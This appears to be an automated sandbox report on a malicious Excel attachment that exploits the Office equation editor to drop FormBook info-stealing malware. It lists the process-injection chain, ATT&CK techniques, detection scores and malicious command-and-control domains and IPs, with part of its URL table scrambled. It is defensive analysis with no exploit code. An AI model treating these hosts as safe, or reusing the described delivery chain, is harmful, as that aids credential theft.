Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.9760000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.vbc.exe.9760000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Native API (1); Shared Modules (1); Exploitation for Client Execution (13); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection (512); Extra Window Memory Injection (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading (111); Virtualization/Sandbox Evasion (2); Process Injection (512); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (31); Software Packing (11); Extra Window Memory Injection (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery (221); Virtualization/Sandbox Evasion (2); Process Discovery (2); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (14); Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (12); Non-Application Layer Protocol (2); Application Layer Protocol (122); Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

          Behavior Graph

Behavior Graph ID: 433035 | Sample: Agency Appointment VSL Tbn-... | Startdate: 11/06/2021 | Architecture: WINDOWS | Score: 100
Top-level DNS/IP info: www.doodstore.net; doodstore.net
Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures

• EXCEL.EXE 38 33 (started)
  • Dropped file: ~$Agency Appointme...etter- 2100133.xlsx, data
• EQNEDT32.EXE 12 (started)
  • DNS/IP info: 192.210.173.40, 49167, 80 AS-COLOCROSSINGUS United States
  • Dropped file: C:\Users\user\AppData\...\loader1[1].exe, PE32
  • Dropped file: C:\Users\Public\vbc.exe, PE32
  • Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  • vbc.exe 20 (started)
    • Dropped file: C:\Users\user\AppData\Local\...\System.dll, PE32
    • Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Machine Learning detection for dropped file; 2 other signatures
    • vbc.exe (started)
      • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      • explorer.exe (injected)
        • DNS/IP info: 192.168.2.22, 49167, 49168, 49169 unknown unknown; www.spinecompanion.com; 5 other IPs or domains
        • Signature: System process connects to network (likely due to code injection or exploit)
        • raserver.exe (started)
          • Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          • cmd.exe (started)

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | 25% | Virustotal |
Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | 22% | ReversingLabs | Document-OLE.Exploit.CVE-2018-0802

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe | 28% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\nsoA180.tmp\System.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\nsoA180.tmp\System.dll | 0% | ReversingLabs |
C:\Users\Public\vbc.exe | 28% | ReversingLabs |

          Unpacked PE Files

Source | Detection | Scanner | Label
4.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
5.2.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
4.2.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
4.2.vbc.exe.9760000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.vbc.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
7.2.raserver.exe.2477960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
7.2.raserver.exe.739160.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
5.1.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe
http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe
http://www.dailymail.co.uk/ | 0% | URL Reputation | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe
http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe
http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe
http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe
http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe
http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Avira URL Cloud | safe
http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe
http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe
http://buscar.ozu.es/ | 0% | URL Reputation | safe
http://busca.igbusca.com.br/ | 0% | URL Reputation | safe
http://search.auction.co.kr/ | 0% | URL Reputation | safe
http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe
http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe
http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe
http://google.pchome.com.tw/ | 0% | URL Reputation | safe
http://www.ozu.es/favicon.ico | 0% | URL Reputation | safe
http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation | safe
http://www.gmarket.co.kr/ | 0% | URL Reputation | safe
http://searchresults.news.com.au/ | 0% | URL Reputation | safe
http://www.asharqalawsat.com/ | 0% | URL Reputation | safe
http://search.yahoo.co.jp | 0% | URL Reputation | safe
http://buscador.terra.es/ | 0% | URL Reputation | safe
http://search.orange.co.uk/favicon.ico | 0% | URL Reputation | safe
http://www.iask.com/ | 0% | URL Reputation | safe
http://cgi.search.biglobe.ne.jp/ | 0% | Avira URL Cloud | safe
http://search.ipop.co.kr/favicon.ico | 0% | URL Reputation | safe
http://p.zhongsou.com/favicon.ico | 0% | URL Reputation | safe
http://service2.bfast.com/ | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.news.com.au/favicon.ico | 0% | URL Reputation | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
webredir.vip.gandi.net | 217.70.184.50 | true | false | | high
doodstore.net | 67.199.248.12 | true | true | | unknown
www.spinecompanion.com | unknown | unknown | true | | unknown
www.dr-farshidtajik.com | unknown | unknown | true | | unknown
www.reufhroir.com | unknown | unknown | true | | unknown
www.pholbhf.icu | unknown | unknown | true | | unknown
www.doodstore.net | unknown | unknown | true | | unknown

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://search.chol.com/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.mercadolivre.com.br/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.merlin.com.pl/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.ebay.de/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.mtv.com/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.rambler.ru/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.nifty.com/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.dailymail.co.uk/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://www3.fnac.com/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://buscar.ya.com/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.yahoo.com/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.2154837486.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sogou.com/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://asp.usatoday.com/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://fr.search.yahoo.com/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://rover.ebay.com | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://in.search.yahoo.com/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://img.shopzilla.com/shopzilla/shopzilla.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.ebay.in/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://image.excite.co.jp/jp/favicon/lep.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://msk.afisha.ru/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://busca.igbusca.com.br//app/static/images/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.rediff.com/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.2151585169.0000000003C40000.00000002.00000001.sdmp | false | | high
http://www.ya.com/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.etmall.com.tw/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://it.search.dada.net/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
http://search.naver.com/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.google.ru/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.hanafos.com/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe |
                                                                  unknown
                                                                  http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.abril.com.br/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://search.daum.net/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                    high
                                                                    http://search.naver.com/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      high
                                                                      http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.clarin.com/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        high
                                                                        http://buscar.ozu.es/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://kr.search.yahoo.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          high
                                                                          http://search.about.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            high
                                                                            http://busca.igbusca.com.br/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              high
                                                                              http://www.ask.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                high
                                                                                http://www.priceminister.com/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  high
                                                                                  http://www.cjmall.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    high
                                                                                    http://search.centrum.cz/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      high
                                                                                      http://suche.t-online.de/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        high
                                                                                        http://www.google.it/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          high
                                                                                          http://search.auction.co.kr/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://www.ceneo.pl/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            high
                                                                                            http://www.amazon.de/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              high
                                                                                              http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000002.2140747061.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2135914914.0000000000409000.00000008.00020000.sdmpfalse
                                                                                                high
                                                                                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2160820434.000000000842E000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://sads.myspace.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://google.pchome.com.tw/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.rambler.ru/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://uk.search.yahoo.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://espanol.search.yahoo.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.ozu.es/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://search.sify.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://openimage.interpark.com/interpark.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://search.ebay.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.gmarket.co.kr/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://search.nifty.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://searchresults.news.com.au/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://www.google.si/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.google.cz/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.soso.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.univision.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://search.ebay.it/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.asharqalawsat.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://busca.orange.es/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://search.yahoo.co.jpexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    http://www.target.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://buscador.terra.es/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://search.orange.co.uk/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.iask.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.tesco.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://cgi.search.biglobe.ne.jp/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://search.seznam.cz/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://suche.freenet.de/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.interpark.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://search.espn.go.com/explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
http://www.myspace.com/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://search.centrum.cz/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://p.zhongsou.com/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://service2.bfast.com/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.%s.comPA | vbc.exe, 00000004.00000002.2141535584.0000000002160000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2145283595.0000000001C70000.00000002.00000001.sdmp | false | URL Reputation: safe (x3) | low
http://ariadna.elmundo.es/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.news.com.au/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe (x3) | unknown
http://www.cdiscount.com/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://www.tiscali.it/favicon.ico | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high
http://it.search.yahoo.com/ | explorer.exe, 00000006.00000000.2165222314.000000000A3E9000.00000008.00000001.sdmp | false | | high

Contacted IPs


Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.210.173.40 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | false

Private

IP
192.168.2.22
192.168.2.255

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 433035
Start date: 11.06.2021
Start time: 08:02:29
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 50s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
